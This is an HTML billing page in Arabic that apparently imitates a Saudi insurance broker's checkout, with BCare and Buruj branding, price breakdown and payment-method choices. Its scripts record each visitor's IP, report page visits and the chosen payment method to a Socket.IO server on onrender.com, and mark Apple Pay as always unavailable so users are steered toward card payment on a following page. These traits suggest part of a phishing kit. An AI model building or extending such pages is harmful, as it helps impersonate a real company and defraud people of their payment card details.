<!DOCTYPE html>

<html lang="ar">
  <head>
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <meta charset="utf-8" />
    <title>Billing</title>
    <link
      crossorigin="anonymous"
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      integrity="sha384-xOolHFLEh07PJGoPkLv1IbcEPTNtaed2xpHsD9ESMhqIYd0nLMwNLD69Npy4HI+N"
      rel="stylesheet"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Readex+Pro:wght@160..700&display=swap");
      @import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css");

      * {
        font-family: "Readex Pro", sans-serif;
        font-optical-sizing: auto;
        font-weight: 400;
        font-style: normal;
        font-variation-settings: "HEXP" 0;
      }
      .content {
        background: white;
        border-radius: 0 0 20px 20px;
        padding: 30px 20px;
        margin: -30px 10px 30px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        min-height: 200px;
        font-size: 16px;
        color: #333;
      }

      .content-section {
        display: none;
      }

      .content-section.active {
        display: block;
      }

      .form-group {
        margin-bottom: 1.5rem;
      }

      .form-group label {
        font-size: 14px;
        font-weight: 400;
        color: #777;
        display: block;
        margin-bottom: 6px;
      }
    </style>
  </head>

  <body dir="rtl">
    <nav class="navbar navbar-expand-lg navbar-light bg-light text-center">
      <img
        alt=""
        src="assets/icon/Bca-logo.svg"
        style="margin: auto"
        width="122px"
      />
    </nav>
    <div class="container mt-4">
      <div class="row justify-content-center">
        <div class="col-md-6 col-lg-4">
          <div
            style="
              border: 1px solid #ddd;
              border-radius: 12px;
              font-family: 'Tahoma', sans-serif;
              overflow: hidden;
            "
          >
            <div style="padding: 16px">
              <div
                class="d-flex align-items-center justify-content-between mb-3"
              >
                <div class="text-right">
                  <div style="color: #146394; font-weight: bold">
                    تفاصيل السعر
                  </div>
                  <div style="font-size: 13px; color: #666">
                    <span id="selected_insurance_type"></span>
                  </div>
                </div>
                <img
                  alt="شعار الشركة"
                  src="assets/photos/buruj.png"
                  style="height: 48px"
                />
              </div>

              <div>
                <div class="d-flex justify-content-between mb-2">
                  <span style="color: #146394">القسط الأساسي</span>
                  <span
                    id="selected_insurance_price"
                    style="color: #146394; font-weight: bold"
                  >
                    <svg
                      style="
                        width: 14px;
                        height: 14px;
                        fill: #146394;
                        vertical-align: middle;
                        margin-right: 4px;
                      "
                      viewbox="0 0 1300 1200"
                    >
                      <path
                        d="M1085.73,895.8c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.33v-135.2l292.27-62.11c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.27V66.13c-50.67,28.45-95.67,66.32-132.25,110.99v403.35l-132.25,28.11V0c-50.67,28.44-95.67,66.32-132.25,110.99v525.69l-295.91,62.88c-20.06,44.47-33.33,92.75-38.42,143.37l334.33-71.05v170.26l-358.3,76.14c-20.06,44.47-33.32,92.75-38.4,143.37l375.04-79.7c30.53-6.35,56.77-24.4,73.83-49.24l68.78-101.97v-.02c7.14-10.55,11.3-23.27,11.3-36.97v-149.98l132.25-28.11v270.4l424.53-90.28Z"
                      ></path>
                    </svg>
                  </span>
                </div>
                <div class="d-flex justify-content-between mb-2">
                  <span style="color: #31a64b">خصم عدم وجود مطالبات</span>
                  <span
                    id="selected_insurance_price_40%"
                    style="color: #31a64b; font-weight: bold"
                  >
                    <svg
                      style="
                        width: 14px;
                        height: 14px;
                        fill: green;
                        vertical-align: middle;
                        margin-right: 4px;
                      "
                      viewbox="0 0 1300 1200"
                    >
                      <path
                        d="M1085.73,895.8c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.33v-135.2l292.27-62.11c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.27V66.13c-50.67,28.45-95.67,66.32-132.25,110.99v403.35l-132.25,28.11V0c-50.67,28.44-95.67,66.32-132.25,110.99v525.69l-295.91,62.88c-20.06,44.47-33.33,92.75-38.42,143.37l334.33-71.05v170.26l-358.3,76.14c-20.06,44.47-33.32,92.75-38.4,143.37l375.04-79.7c30.53-6.35,56.77-24.4,73.83-49.24l68.78-101.97v-.02c7.14-10.55,11.3-23.27,11.3-36.97v-149.98l132.25-28.11v270.4l424.53-90.28Z"
                      ></path>
                    </svg>
                  </span>
                </div>
                <div class="d-flex justify-content-between mb-2">
                  <span style="color: #146394">ضريبة القيمة المضافة</span>
                  <span
                    id="selected_insurance_price_15%"
                    style="color: #146394; font-weight: bold"
                  >
                    <svg
                      style="
                        width: 14px;
                        height: 14px;
                        fill: #146394;
                        vertical-align: middle;
                        margin-right: 4px;
                      "
                      viewbox="0 0 1300 1200"
                    >
                      <path
                        d="M1085.73,895.8c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.33v-135.2l292.27-62.11c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.27V66.13c-50.67,28.45-95.67,66.32-132.25,110.99v403.35l-132.25,28.11V0c-50.67,28.44-95.67,66.32-132.25,110.99v525.69l-295.91,62.88c-20.06,44.47-33.33,92.75-38.42,143.37l334.33-71.05v170.26l-358.3,76.14c-20.06,44.47-33.32,92.75-38.4,143.37l375.04-79.7c30.53-6.35,56.77-24.4,73.83-49.24l68.78-101.97v-.02c7.14-10.55,11.3-23.27,11.3-36.97v-149.98l132.25-28.11v270.4l424.53-90.28Z"
                      ></path>
                    </svg>
                  </span>
                </div>
              </div>
            </div>

            <div
              style="background-color: #f8f8f8; padding: 16px 20px 10px 20px"
            >
              <div
                class="d-flex justify-content-between align-items-center mb-1"
              >
                <span style="color: #146394; font-weight: 800; font-size: 20px"
                  >المجموع</span
                >
                <span
                  id="selected_insurance_price_final"
                  style="
                    color: #faa62e;
                    font-size: 22px;
                    font-weight: bold;
                    display: flex;
                    align-items: center;
                  "
                >
                  <svg
                    style="
                      width: 18px;
                      height: 18px;
                      fill: #faa62e;
                      margin-right: 6px;
                    "
                    viewbox="0 0 1300 1200"
                  >
                    <path
                      d="M1085.73,895.8c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.33v-135.2l292.27-62.11c20.06-44.47,33.32-92.75,38.4-143.37l-330.68,70.27V66.13c-50.67,28.45-95.67,66.32-132.25,110.99v403.35l-132.25,28.11V0c-50.67,28.44-95.67,66.32-132.25,110.99v525.69l-295.91,62.88c-20.06,44.47-33.33,92.75-38.42,143.37l334.33-71.05v170.26l-358.3,76.14c-20.06,44.47-33.32,92.75-38.4,143.37l375.04-79.7c30.53-6.35,56.77-24.4,73.83-49.24l68.78-101.97v-.02c7.14-10.55,11.3-23.27,11.3-36.97v-149.98l132.25-28.11v270.4l424.53-90.28Z"
                    ></path>
                  </svg>
                </span>
              </div>
              <div style="font-size: 12px; color: #666; text-align: left">
                شامل 2% قيمة عمولة الوسيط
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="container mt-4">
      <div class="row justify-content-center">
        <div class="col-md-6 col-lg-4">
          <div
            class="clickable-card"
            style="
              border: 1px solid #ddd;
              border-radius: 12px;
              font-family: 'Tahoma', sans-serif;
              overflow: hidden;
              cursor: pointer;
            "
          >
            <div style="padding: 16px">
              <div class="d-flex align-items-center justify-content-between">
                <div class="text-right">
                  <div
                    class="d-flex justify-content-end row align-items-center mr-2"
                    dir="ltr"
                    style="color: #656565; font-weight: bold"
                  >
                    <h5 class="mr-4">مدى</h5>
                    <input
                      class="form-check-input"
                      id="mada"
                      name="Radios"
                      type="radio"
                      value="mada"
                      style="margin-top: auto"
                    />
                  </div>
                </div>
                <img alt="شعار الشركة" src="assets/photos/mad.png" width="70" />
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="container mt-4">
      <div class="row justify-content-center">
        <div class="col-md-6 col-lg-4">
          <div
            class="clickable-card"
            style="
              border: 1px solid #ddd;
              border-radius: 12px;
              font-family: 'Tahoma', sans-serif;
              overflow: hidden;
              cursor: pointer;
            "
          >
            <div style="padding: 16px">
              <div class="d-flex align-items-center justify-content-between">
                <div class="text-right">
                  <div
                    class="d-flex justify-content-end row align-items-center mr-2"
                    dir="ltr"
                    style="color: #656565; font-weight: bold"
                  >
                    <h5 class="mr-4">فيزا ، ماستركارد</h5>
                    <input
                      class="form-check-input"
                      id="visa_mastarcard"
                      name="Radios"
                      type="radio"
                      value="visa_mastarcard"
                      style="margin-top: auto"
                    />
                  </div>
                </div>
                <img
                  alt="شعار الشركة"
                  src="assets/photos/vimas.webp"
                  style="height: 30px"
                />
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <!-- Apple Pay Card -->
    <div class="container mt-4">
      <div class="row justify-content-center">
        <div class="col-md-6 col-lg-4">
          <div
            class="clickable-card"
            style="
              border: 1px solid #ddd;
              border-radius: 12px;
              font-family: 'Tahoma', sans-serif;
              overflow: hidden;
              cursor: pointer;
            "
          >
            <div style="padding: 16px">
              <div class="d-flex align-items-center justify-content-between">
                <div class="text-right">
                  <div
                    class="d-flex justify-content-end align-items-center mr-2"
                    dir="ltr"
                    style="color: #656565; font-weight: bold"
                  >
                    <h5 class="mr-4">أبل باي</h5>
                    <input
                      class="form-check-input"
                      id="applepay"
                      name="Radios"
                      type="radio"
                      value="applepay"
                      style="margin-top: auto"
                    />
                  </div>
                </div>
                <img
                  alt="شعار الشركة"
                  src="assets/photos/appy.jpg"
                  width="55"
                />
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <!-- Alert -->
    <div class="container mt-2 text-right">
      <div class="alert alert-danger d-none" id="applePayAlert" role="alert">
        <span style="font-size: 14px; color: red">
          عذراً خدمة الدفع عبر أبل باي متوقفة مؤقتاً يمكنك التمتع بتجربة دفع
          سلسة وآمنة عبر بطاقات الدفع.
        </span>
      </div>
    </div>

    <div class="container mt-4 mb-3">
      <button
        class="btn col-12 p-3"
        id="goToPayment"
        style="background-color: #faa62e; color: #fff; font-weight: 700"
        type="button"
      >
        إتمام عملية الدفع
      </button>
    </div>
    <!-- 1) Load Socket.IO once & bootstrap visitorIP + location -->
    <script src="https://cdn.socket.io/4.6.1/socket.io.min.js"></script>
    <script>
      window.socket = io("https://b-care-server.onrender.com");
      window.visitorIP = null;
      (async () => {
        try {
          const r = await fetch("https://api.ipify.org?format=json");
          window.visitorIP = (await r.json()).ip;
        } catch (e) {
          console.error("IP fetch failed", e);
        } finally {
          const page =
            window.location.pathname.split("/").pop() || "billing.html";
          window.socket.emit("updateLocation", { ip: window.visitorIP, page });
        }
      })();
    </script>
    <script src="./assets/js/location.js"></script>

    <!-- 2) Price calculation & UI injection -->
    <script>
      // read stored totalPrice from previous page (base premium)
      const base = parseFloat(sessionStorage.getItem("totalPrice") || "0");
      // compute discount (40%) and VAT (15%)
      const discount = base * 0.4;
      const vat = base * 0.15;
      const final = base - discount + vat;

      // inject into the four spans
      document.getElementById("selected_insurance_price").textContent =
        base.toFixed(2);
      document.getElementById("selected_insurance_price_40%").textContent =
        discount.toFixed(2);
      document.getElementById("selected_insurance_price_15%").textContent =
        vat.toFixed(2);
      document.getElementById("selected_insurance_price_final").textContent =
        final.toFixed(2);

      // overwrite sessionStorage so other pages can read the final
      sessionStorage.setItem("totalPrice", final.toFixed(2));
    </script>

    <!-- 3) Payment-method UI logic (unchanged) -->
    <script>
      const paymentAlert = document.getElementById("applePayAlert");
      const payButton = document.getElementById("goToPayment");

      // entire card click selects radio
      document.querySelectorAll(".clickable-card").forEach((card) => {
        card.addEventListener("click", (e) => {
          if (e.target.tagName.toLowerCase() === "input") return;
          const r = card.querySelector('input[name="Radios"]');
          r.checked = true;
          r.dispatchEvent(new Event("change"));
        });
      });

      // Apple Pay disables button
      document.querySelectorAll('input[name="Radios"]').forEach((radio) => {
        radio.addEventListener("change", () => {
          if (radio.id === "applepay" && radio.checked) {
            paymentAlert.className = "alert alert-danger d-flex";
            payButton.disabled = true;
          } else if (radio.checked) {
            paymentAlert.className = "alert alert-danger d-none";
            payButton.disabled = false;
          }
        });
      });

      // init disable if Apple pre-checked
      window.addEventListener("DOMContentLoaded", () => {
        if (document.getElementById("applepay").checked) {
          payButton.disabled = true;
        }
      });
    </script>

    <!-- 4) Submit via socket and handle ack -->
    <script>
      payButton.addEventListener("click", async () => {
        // ensure IP is ready
        while (!window.visitorIP) {
          await new Promise((r) => setTimeout(r, 50));
        }

        // get chosen method
        const method = document.querySelector(
          'input[name="Radios"]:checked'
        )?.value;
        if (!method) {
          return alert("يرجى اختيار طريقة الدفع أولاً");
        }

        // ←── STORE IT ──→
        sessionStorage.setItem("paymentMethod", method);

        // build payload
        const payload = {
          ip: window.visitorIP,
          mada: method === "mada",
          visa_mastarcard: method === "visa_mastarcard",
          applepay: method === "applepay",
          totalPrice: parseFloat(sessionStorage.getItem("totalPrice")),
        };

        window.socket.emit("submitBilling", payload);
      });

      // on ack, redirect or show error
      window.socket.on("ackBilling", (resp) => {
        if (resp.success) {
          window.location.href = "paymen.html";
        } else {
          alert("حدث خطأ أثناء الإرسال، حاول مرة أخرى.");
          console.error(resp.error);
        }
      });
    </script>
  </body>
</html>
